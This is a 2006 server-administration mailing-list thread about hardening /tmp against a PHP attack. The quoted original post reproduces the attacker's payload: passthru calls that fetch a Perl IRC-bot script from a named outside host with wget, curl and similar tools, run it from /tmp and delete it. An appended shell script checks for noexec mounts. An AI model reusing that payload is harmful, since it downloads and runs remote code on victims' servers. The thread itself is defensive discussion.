
Date:  Mon, 11 Sep 2006 10:17:31 +0100
From:  "Paul Wilson - Swift Internet" <paulw (at mark) swiftinter.net>
Subject:  [coba-e:06820] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <02d301c6d583$260daba0$0e00a8c0 (at mark) office.swiftinter.net>
References:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
X-Mail-Count: 06820

Have you considered putting an application firewall on your box?

We installed mod_security on our servers - these attacks can then get 
bounced off. Providing you keep an eye open for new attack methods, you can 
then stay on top of it.

www.gotroot.com
www.modsecurity.org

Regards

Paul


----- Original Message ----- 
From: "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
To: <coba-e (at mark) bluequartz.org>
Sent: Saturday, September 09, 2006 9:44 PM
Subject: [coba-e:06808] /TMP Directory


> There was some discussion here lately about the security fix that stopped
> programs from running in /TMP.  Is this configured by default if you have
> your BQ Yum updated?  I got a DDOS today where the users were trying to
> run the following program via PHP:
>
> <?
> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> passthru('cd /tmp;lwp-download
> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> ?>
>
> The v6.txt is a Perl script that installs some IRC software and monitors
> IRC on open ports.  I do not think the script was successful in running,
> but I just want to make sure the /TMP security is enabled where files
> can't be run there.  While I don't think the DDOS attack was successful
> in running the script, it was successful in shutting down the server due
> to MySQL becoming overwhelmed.  Server load was up to 156!
>
> Any suggestions would be appreciated.
>


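An added check, not from either poster, for the underlying question of whether /tmp really blocks execution. It reads mount options in /proc/mounts format (the sample lines below are constructed, not from a real box) and also tries to run a throwaway script in the directory, because a /tmp that is only a subdirectory of / inherits the root filesystem's exec option and will show no mount line of its own.

```shell
#!/bin/sh
# Constructed sample in /proc/mounts format: /tmp mounted noexec, /var/tmp not.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
tmpfs /tmp tmpfs rw,nosuid,noexec,nodev 0 0
/dev/sda5 /var/tmp ext3 rw,nosuid 0 0'

# Print "noexec" or "exec" for mount point $2 as listed in mounts file $1.
# Exit status 1 when $2 is not a mount point of its own (inherits its parent).
mount_exec_status() {
  awk -v mp="$2" '
    $2 == mp {
      found = 1
      n = split($4, o, ",")
      for (i = 1; i <= n; i++) if (o[i] == "noexec") { print "noexec"; exit 0 }
      print "exec"; exit 0
    }
    END { if (!found) exit 1 }' "$1"
}

# Functional probe: drop a trivial script into directory $1 and try to run it.
# Returns 0 when it executed (exec allowed), 1 otherwise (noexec or unwritable).
probe_exec_in_dir() {
  probe="$1/.exec-probe.$$"
  printf '#!/bin/sh\nexit 0\n' > "$probe" && chmod 700 "$probe" || return 1
  if "$probe" 2>/dev/null; then rc=0; else rc=1; fi
  rm -f "$probe"
  return $rc
}

# One-line verdict combining the mount-table view and the live probe.
report() {
  dir="$1"
  m=$(mount_exec_status /proc/mounts "$dir" 2>/dev/null) \
    || m="no own mount line (inherits parent options)"
  if probe_exec_in_dir "$dir"; then p="scripts DO run"; else p="scripts do not run"; fi
  echo "$dir: mount table says '$m'; probe says $p"
}

# Live run on the current host, only where /proc/mounts is readable.
if [ -r /proc/mounts ]; then
  report /tmp
  report /var/tmp
fi
```

A "noexec" mount verdict with a probe that still runs means something is bypassing the option (for example an interpreter invoked on the file, as the posted payload does with `perl v6.txt`), so treat the probe as necessary but not sufficient.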